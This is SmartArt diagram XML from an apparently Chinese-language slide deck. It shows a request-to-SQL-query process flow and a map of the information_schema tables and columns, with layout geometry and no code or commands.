            <a:t>服务器接收请求</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A939E53D-EA4A-4976-8535-DAD23D4902C4}" type="parTrans" cxnId="{9E3005B1-4664-4C28-BDC4-64E28D136997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{134C0568-984B-46AA-A16B-8B0744407308}" type="sibTrans" cxnId="{9E3005B1-4664-4C28-BDC4-64E28D136997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>拼接</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>语句</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{376075E0-8DF5-4DDC-9E31-77DF2F498281}" type="parTrans" cxnId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" type="sibTrans" cxnId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库查询</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC64D69E-795B-4276-B2D7-6C96349F216C}" type="parTrans" cxnId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" type="sibTrans" cxnId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB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F324F636-899C-4D23-BC15-0AE59DA37585}" type="parTrans" cxnId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8542300-35A6-44E1-9444-1F562DBE454E}" type="sibTrans" cxnId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" type="pres">
      <dgm:prSet presAssocID="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" type="pres">
      <dgm:prSet presAssocID="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" type="pres">
      <dgm:prSet presAssocID="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" type="pres">
      <dgm:prSet presAssocID="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" type="pres">
      <dgm:prSet presAssocID="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" type="pres">
      <dgm:prSet presAssocID="{134C0568-984B-46AA-A16B-8B0744407308}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" type="pres">
      <dgm:prSet presAssocID="{134C0568-984B-46AA-A16B-8B0744407308}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" type="pres">
      <dgm:prSet presAssocID="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4455981C-5A36-4755-8675-D715979889BB}" type="pres">
      <dgm:prSet presAssocID="{061260F6-5682-4FB4-9457-D55AD9A459EB}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" type="pres">
      <dgm:prSet presAssocID="{061260F6-5682-4FB4-9457-D55AD9A459EB}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" type="pres">
      <dgm:prSet presAssocID="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" type="pres">
      <dgm:prSet presAssocID="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" type="pres">
      <dgm:prSet presAssocID="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}" type="pres">
      <dgm:prSet presAssocID="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7EC09105-358F-401A-BA41-F934879A04B6}" type="presOf" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" srcOrd="4" destOrd="0" parTransId="{F324F636-899C-4D23-BC15-0AE59DA37585}" sibTransId="{C8542300-35A6-44E1-9444-1F562DBE454E}"/>
    <dgm:cxn modelId="{A01D0717-085C-4943-8CB4-6D1515796C4B}" type="presOf" srcId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" destId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" srcOrd="3" destOrd="0" parTransId="{FC64D69E-795B-4276-B2D7-6C96349F216C}" sibTransId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}"/>
    <dgm:cxn modelId="{402AD21B-068C-41FB-A2A9-1972F668467D}" type="presOf" srcId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" destId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{97C3D23D-28B4-4B5C-90BF-CF99150C92DF}" type="presOf" srcId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" destId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5BA87F6C-4803-4E57-934F-78039482FDBD}" type="presOf" srcId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" destId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FBFDB04F-42AE-4887-B30A-F5A7B503CA1C}" type="presOf" srcId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" destId="{4455981C-5A36-4755-8675-D715979889BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A335D275-C5E5-473F-AF57-45FA835069BA}" type="presOf" srcId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" destId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6E5DBB77-D593-4D26-AD3C-A57064853F56}" type="presOf" srcId="{134C0568-984B-46AA-A16B-8B0744407308}" destId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" srcOrd="2" destOrd="0" parTransId="{376075E0-8DF5-4DDC-9E31-77DF2F498281}" sibTransId="{061260F6-5682-4FB4-9457-D55AD9A459EB}"/>
    <dgm:cxn modelId="{DF7B8595-512D-409E-914D-0B96838875DC}" type="presOf" srcId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" destId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{9E3005B1-4664-4C28-BDC4-64E28D136997}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" srcOrd="1" destOrd="0" parTransId="{A939E53D-EA4A-4976-8535-DAD23D4902C4}" sibTransId="{134C0568-984B-46AA-A16B-8B0744407308}"/>
    <dgm:cxn modelId="{420B6CB3-4786-4E51-BB1A-0636CD7ABA54}" type="presOf" srcId="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" destId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{793858C2-6698-450E-B74B-77CA4040C937}" type="presOf" srcId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" destId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{882C46C3-BFF2-49DF-AB96-002891E560F5}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" srcOrd="0" destOrd="0" parTransId="{9A594DB2-8872-4854-8CBF-002B4AE223B4}" sibTransId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}"/>
    <dgm:cxn modelId="{D667E8CD-DA1E-40E5-BDA7-F6481B995F16}" type="presOf" srcId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" destId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DC22A5D1-B7A9-404E-8F83-87154F18BC9E}" type="presOf" srcId="{134C0568-984B-46AA-A16B-8B0744407308}" destId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F08653DA-EED7-4B47-9FC3-74593602F64A}" type="presOf" srcId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" destId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8E3A3852-6AC3-4292-896C-326537E1A47E}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1DAE21BF-2576-44F7-AD28-0792AE258772}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{88220965-D354-4BF0-98B6-1CA06DC9A1CA}" type="presParOf" srcId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" destId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{47B7D142-809A-47A5-93BD-0F8B2AAF98E0}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{54A990D7-F3DC-4510-909C-692A5467C8EA}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F8EBB8A5-89B1-4D58-8A33-4E8077E8FC40}" type="presParOf" srcId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" destId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F0DA19F5-775F-4393-B59D-1EB09F522EF9}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{504C5C21-0D5F-487D-A095-5D1F85B80652}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{4455981C-5A36-4755-8675-D715979889BB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{60B189F1-DF01-43D6-AA54-EA516BA69268}" type="presParOf" srcId="{4455981C-5A36-4755-8675-D715979889BB}" destId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{17EF582D-C571-4490-B1F2-2CD7349B300E}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A3DD6A40-3A31-431E-A64A-1B41B402DE30}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{853C13F3-51E0-4DE5-954A-5500AD98B6B7}" type="presParOf" srcId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" destId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{673BD6B8-9A71-4094-9E89-FECF4AC756DD}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{42DA8F42-25C0-4654-B3B6-F4044BAF703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3118E-FD59-4C6C-8208-4B19406086A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="502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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32386" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="171784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717848" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="218498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服务器接收请求</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2212346" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="389780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897808" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436494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拼接</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2300" kern="1200" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2300" kern="1200" dirty="0"/>
            <a:t>语句</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4392306" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4455981C-5A36-4755-8675-D715979889BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="607776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077768" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="654490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数据库查询</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6572266" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="825772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8257728" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="872486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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8752226" y="2112929"/>
        <a:ext cx="1502386" cy="879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560AB-BA9F-48FB-B2EC-F252F3AC5BF9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="908885" y="1596233"/>
          <a:ext cx="1006110" cy="533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默认表</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="924518" y="1611866"/>
        <a:ext cx="974844" cy="502483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AE55948D-7313-49E8-8713-84457763C076}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18353101">
          <a:off x="1674144" y="1371253"/>
          <a:ext cx="1163984" cy="40653"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="20326"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1163984" y="20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27037" y="1362480"/>
        <a:ext cx="58199" cy="58199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{723662F3-EEE4-4B81-8C6D-2F80A2BBCF50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2597278" y="527242"/>
          <a:ext cx="1705705" cy="785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Information_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schema</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2620288" y="550252"/>
        <a:ext cx="1659685" cy="739602"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C45A8441-C464-4588-9E5B-2D7B1643A132}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="4224008" y="654531"/>
          <a:ext cx="840233" cy="40653"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="20326"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="840233" y="20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23118" y="653852"/>
        <a:ext cx="42011" cy="42011"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{611C6EAB-7EF2-459E-B6A3-D344F3DFB689}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4985265" y="3236"/>
          <a:ext cx="2528076" cy="85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Informmation_schema.tables</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5010244" y="28215"/>
        <a:ext cx="2478118" cy="802894"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6E9C960-1AE3-4B5D-A295-29418EE82707}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="4224008" y="1144921"/>
          <a:ext cx="840233" cy="40653"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="20326"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="840233" y="20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23118" y="1144242"/>
        <a:ext cx="42011" cy="42011"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{143581EA-6E8C-4CB2-A1EA-64C218E74477}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4985265" y="984017"/>
          <a:ext cx="2589448" cy="852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Information_scheme.columns</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5010244" y="1008996"/>
        <a:ext cx="2539490" cy="802894"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1543022A-AC84-444E-85BC-F75C8C579614}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3350849">
          <a:off x="1648473" y="2345650"/>
          <a:ext cx="1215327" cy="40653"/>
